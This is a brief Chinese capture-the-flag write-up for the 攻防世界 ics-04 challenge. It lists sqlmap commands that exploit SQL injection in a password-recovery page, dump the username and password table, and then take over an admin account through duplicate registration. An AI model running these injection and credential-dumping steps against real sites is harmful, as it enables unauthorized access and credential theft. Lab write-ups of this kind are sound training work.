• 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

[wp] 攻防世界 ics-04

互联网 diligentman 3天前 8次浏览

尝试注册登陆账号
[wp] 攻防世界 ics-04
扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入

sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1"
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --dbs
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 --tables
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user --columns
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user -C username&password --dump

[wp] 攻防世界 ics-04
被hash加密了,发现注册页面可以再次注册c3tlwDmIn23这个账号,成功重置密码,登入得到flag
[wp] 攻防世界 ics-04


喜欢 (0)